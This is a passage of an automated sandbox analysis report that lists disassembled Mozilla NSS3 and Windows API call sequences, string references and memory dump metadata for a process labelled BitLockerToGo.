                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(?,?,6C5C204A), ref: 6C6308FB
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C684DD7
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C684DEC
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C684E1B
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C684E2F
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C684E5A
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C684E71
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C684E7A
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C684EA2
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C684EC1
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C684ED6
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C684F01
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C684F2A
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 759471828-0
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6C6D6BF7), ref: 6C6D6EB6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C631240: TlsGetValue.KERNEL32(00000040,?,6C63116C,NSPR_LOG_MODULES), ref: 6C631267
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C631240: EnterCriticalSection.KERNEL32(?,?,?,6C63116C,NSPR_LOG_MODULES), ref: 6C63127C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C631240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C63116C,NSPR_LOG_MODULES), ref: 6C631291
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C631240: PR_Unlock.NSS3(?,?,?,?,6C63116C,NSPR_LOG_MODULES), ref: 6C6312A0
                                                                                                                                                                                                                                                                                                                                                          • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6C77FC0A,6C6D6BF7), ref: 6C6D6ECD
                                                                                                                                                                                                                                                                                                                                                          • ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C6D6EE0
                                                                                                                                                                                                                                                                                                                                                          • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6C6D6EFC
                                                                                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C6D6F04
                                                                                                                                                                                                                                                                                                                                                          • fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C6D6F18
                                                                                                                                                                                                                                                                                                                                                          • PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6C6D6BF7), ref: 6C6D6F30
                                                                                                                                                                                                                                                                                                                                                          • PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6C6D6BF7), ref: 6C6D6F54
                                                                                                                                                                                                                                                                                                                                                          • PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6C6D6BF7), ref: 6C6D6FE0
                                                                                                                                                                                                                                                                                                                                                          • PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6C6D6BF7), ref: 6C6D6FFD
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          • SSLFORCELOCKS, xrefs: 6C6D6F2B
                                                                                                                                                                                                                                                                                                                                                          • SSLKEYLOGFILE, xrefs: 6C6D6EB1
                                                                                                                                                                                                                                                                                                                                                          • NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6C6D6FDB
                                                                                                                                                                                                                                                                                                                                                          • # SSL/TLS secrets log file, generated by NSS, xrefs: 6C6D6EF7
                                                                                                                                                                                                                                                                                                                                                          • NSS_SSL_CBC_RANDOM_IV, xrefs: 6C6D6FF8
                                                                                                                                                                                                                                                                                                                                                          • NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6C6D6F4F
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
                                                                                                                                                                                                                                                                                                                                                          • String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 412497378-2352201381
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(0000001C,?,6C6AE853,?,FFFFFFFF,?,?,6C6AB0CC,?,6C6AB4A0,?,00000000), ref: 6C6AE8D9
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0D30: calloc.MOZGLUE ref: 6C6A0D50
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0D30: TlsGetValue.KERNEL32 ref: 6C6A0D6D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6AC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C6ADAE2,?), ref: 6C6AC6C2
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(?), ref: 6C6AE972
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(?), ref: 6C6AE9C2
                                                                                                                                                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C6AEA00
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,-00000007), ref: 6C6AEA3F
                                                                                                                                                                                                                                                                                                                                                          • SECOID_FindOIDByTag_Util.NSS3(00000010), ref: 6C6AEA5A
                                                                                                                                                                                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C6AEA81
                                                                                                                                                                                                                                                                                                                                                          • SECOID_SetAlgorithmID_Util.NSS3(?,?,00000010,00000000), ref: 6C6AEA9E
                                                                                                                                                                                                                                                                                                                                                          • SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C6AEACF
                                                                                                                                                                                                                                                                                                                                                          • PK11_KeyGen.NSS3(00000000,-00000001,00000000,?,00000000), ref: 6C6AEB56
                                                                                                                                                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(00000000), ref: 6C6AEBC2
                                                                                                                                                                                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3(?), ref: 6C6AEBEC
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C6AEC58
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$Find$ArenaTag_$AlgorithmAlloc_K11_Mark_$DestroyFreePublicValuecallocfree
                                                                                                                                                                                                                                                                                                                                                          • String ID: Sjl
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6D5B40: PR_GetIdentitiesLayer.NSS3 ref: 6C6D5B56
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C6D290A
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000001), ref: 6C6D291E
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C6D2937
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000001), ref: 6C6D294B
                                                                                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C6D2966
                                                                                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C6D29AC
                                                                                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C6D29D1
                                                                                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C6D29F0
                                                                                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C6D2A15
                                                                                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C6D2A37
                                                                                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C6D2A61
                                                                                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C6D2A78
                                                                                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C6D2A8F
                                                                                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C6D2AA6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709440: TlsGetValue.KERNEL32 ref: 6C70945B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709440: TlsGetValue.KERNEL32 ref: 6C709479
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709440: EnterCriticalSection.KERNEL32 ref: 6C709495
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709440: TlsGetValue.KERNEL32 ref: 6C7094E4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709440: TlsGetValue.KERNEL32 ref: 6C709532
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709440: LeaveCriticalSection.KERNEL32 ref: 6C70955D
                                                                                                                                                                                                                                                                                                                                                          • PK11_HPKE_DestroyContext.NSS3(?,00000001), ref: 6C6D2AF9
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C6D2B16
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C6D2B6D
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C6D2B80
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Monitor$Enter$Value$Exit$CriticalSection$Unlock$ContextDestroyIdentitiesK11_LayerLeavefree
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,00000080), ref: 6C759C70
                                                                                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C759C85
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7098D0: calloc.MOZGLUE(00000001,00000084,6C630936,00000001,?,6C63102C), ref: 6C7098E5
                                                                                                                                                                                                                                                                                                                                                          • PR_NewCondVar.NSS3(00000000), ref: 6C759C96
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C62BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6C6321BC), ref: 6C62BB8C
                                                                                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C759CA9
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7098D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C709946
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7098D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C5C16B7,00000000), ref: 6C70994E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7098D0: free.MOZGLUE(00000000), ref: 6C70995E
                                                                                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C759CB9
                                                                                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C759CC9
                                                                                                                                                                                                                                                                                                                                                          • PR_NewCondVar.NSS3(00000000), ref: 6C759CDA
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C62BB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6C62BBEB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C62BB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6C62BBFB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C62BB80: GetLastError.KERNEL32 ref: 6C62BC03
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C62BB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6C62BC19
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C62BB80: free.MOZGLUE(00000000), ref: 6C62BC22
                                                                                                                                                                                                                                                                                                                                                          • PR_NewCondVar.NSS3(?), ref: 6C759CF0
                                                                                                                                                                                                                                                                                                                                                          • PR_NewPollableEvent.NSS3 ref: 6C759D03
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74F3B0: PR_CallOnce.NSS3(6C7A14B0,6C74F510), ref: 6C74F3E6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74F3B0: PR_CreateIOLayerStub.NSS3(6C7A006C), ref: 6C74F402
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74F3B0: PR_Malloc.NSS3(00000004), ref: 6C74F416
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74F3B0: PR_NewTCPSocketPair.NSS3(?), ref: 6C74F42D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74F3B0: PR_SetSocketOption.NSS3(?), ref: 6C74F455
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74F3B0: PR_PushIOLayer.NSS3(?,000000FE,00000000), ref: 6C74F473
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709890: TlsGetValue.KERNEL32(?,?,?,6C7097EB), ref: 6C70989E
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C759D78
                                                                                                                                                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,0000000C), ref: 6C759DAF
                                                                                                                                                                                                                                                                                                                                                          • _PR_CreateThread.NSS3(00000000,6C759EA0,00000000,00000001,00000001,00000000,?,00000000), ref: 6C759D9F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C62B3C0: TlsGetValue.KERNEL32 ref: 6C62B403
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C62B3C0: _PR_NativeCreateThread.NSS3(?,?,?,?,?,?,?,?), ref: 6C62B459
                                                                                                                                                                                                                                                                                                                                                          • _PR_CreateThread.NSS3(00000000,6C75A060,00000000,00000001,00000001,00000000,?,00000000), ref: 6C759DE8
                                                                                                                                                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,0000000C), ref: 6C759DFC
                                                                                                                                                                                                                                                                                                                                                          • _PR_CreateThread.NSS3(00000000,6C75A530,00000000,00000001,00000001,00000000,?,00000000), ref: 6C759E29
                                                                                                                                                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,0000000C), ref: 6C759E3D
                                                                                                                                                                                                                                                                                                                                                          • _PR_MD_UNLOCK.NSS3(?), ref: 6C759E71
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE890,00000000), ref: 6C759E89
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: calloc$CreateError$LockThread$CondCriticalSection$CountInitializeLastLayerSocketSpinValuefree$CallEnterEventMallocNativeOnceOptionPairPollablePushStub
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4254102231-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 29fa0b03d0d387b8cbc654fe0af54a573d14ed95342966368f3ab8765c043318
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 54878f80bf2fa68f00126a230a55093d33ba55d6e0c517f5ffd484ff096b4588
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 29fa0b03d0d387b8cbc654fe0af54a573d14ed95342966368f3ab8765c043318
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B614FF1A00706AFD710DF75C948A67BBE8FF59208B044539E85AC7B51EB30E825CBA5
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • memchr.VCRUNTIME140(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_,00000000,00000041,6C698E01,00000000,6C699060,6C7A0B64), ref: 6C698E7B
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6C698E01,00000000,6C699060,6C7A0B64), ref: 6C698E9E
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(6C7A0B64,00000001,?,?,?,?,6C698E01,00000000,6C699060,6C7A0B64), ref: 6C698EAD
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,6C698E01,00000000,6C699060,6C7A0B64), ref: 6C698EC3
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(5D8B5657,?,?,?,?,?,?,?,?,?,6C698E01,00000000,6C699060,6C7A0B64), ref: 6C698ED8
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,6C698E01,00000000,6C699060,6C7A0B64), ref: 6C698EE5
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,5D8B5657,00000001,?,?,?,?,?,?,?,?,?,?,?,?,6C698E01), ref: 6C698EFB
                                                                                                                                                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C7A0B64,6C7A0B64), ref: 6C698F11
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaGrow_Util.NSS3(?,5D8B5657,643D8B08), ref: 6C698F3F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69A110: PORT_ArenaGrow_Util.NSS3(8514C483,EB2074C0,184D8B3E,?,00000000,00000000,00000000,FFFFFFFF,?,6C69A421,00000000,00000000,6C699826), ref: 6C69A136
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C69904A
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          • abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_, xrefs: 6C698E76
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: ArenaUtil$Alloc_Grow_memcpystrlen$Errormemchrstrcmp
                                                                                                                                                                                                                                                                                                                                                          • String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 977052965-1032500510
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e4db0659b6109f399a8a2c5d3f73e75084473a11941c800956e1201907de4c8a
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 13eb6ff4318b3fd66fd22ff8231a98eaf6ab3c01f6cc5b15ad8245fc15bf23e8
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e4db0659b6109f399a8a2c5d3f73e75084473a11941c800956e1201907de4c8a
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC61D4B5D0010A9FDB10CF65CC44AAFB7B5FF88358F144428DC29A7710EB36A915CBA5
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C648E5B
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE007,00000000), ref: 6C648E81
                                                                                                                                                                                                                                                                                                                                                          • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C648EED
                                                                                                                                                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C7718D0,?), ref: 6C648F03
                                                                                                                                                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C7A2AA4,6C6A12D0), ref: 6C648F19
                                                                                                                                                                                                                                                                                                                                                          • PL_FreeArenaPool.NSS3(?), ref: 6C648F2B
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C648F53
                                                                                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C648F65
                                                                                                                                                                                                                                                                                                                                                          • PL_FinishArenaPool.NSS3(?), ref: 6C648FA1
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_DupItem_Util.NSS3(?), ref: 6C648FFE
                                                                                                                                                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C7A2AA4,6C6A12D0), ref: 6C649012
                                                                                                                                                                                                                                                                                                                                                          • PL_FreeArenaPool.NSS3(?), ref: 6C649024
                                                                                                                                                                                                                                                                                                                                                          • PL_FinishArenaPool.NSS3(?), ref: 6C64902C
                                                                                                                                                                                                                                                                                                                                                          • PORT_DestroyCheapArena.NSS3(?), ref: 6C64903E
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
                                                                                                                                                                                                                                                                                                                                                          • String ID: security
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3512696800-3315324353
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C70CC7B), ref: 6C70CD7A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C70CE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6C67C1A8,?), ref: 6C70CE92
                                                                                                                                                                                                                                                                                                                                                          • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C70CDA5
                                                                                                                                                                                                                                                                                                                                                          • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C70CDB8
                                                                                                                                                                                                                                                                                                                                                          • PR_UnloadLibrary.NSS3(00000000), ref: 6C70CDDB
                                                                                                                                                                                                                                                                                                                                                          • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C70CD8E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6305C0: PR_EnterMonitor.NSS3 ref: 6C6305D1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6305C0: PR_ExitMonitor.NSS3 ref: 6C6305EA
                                                                                                                                                                                                                                                                                                                                                          • PR_LoadLibrary.NSS3(wship6.dll), ref: 6C70CDE8
                                                                                                                                                                                                                                                                                                                                                          • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C70CDFF
                                                                                                                                                                                                                                                                                                                                                          • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C70CE16
                                                                                                                                                                                                                                                                                                                                                          • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C70CE29
                                                                                                                                                                                                                                                                                                                                                          • PR_UnloadLibrary.NSS3(00000000), ref: 6C70CE48
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
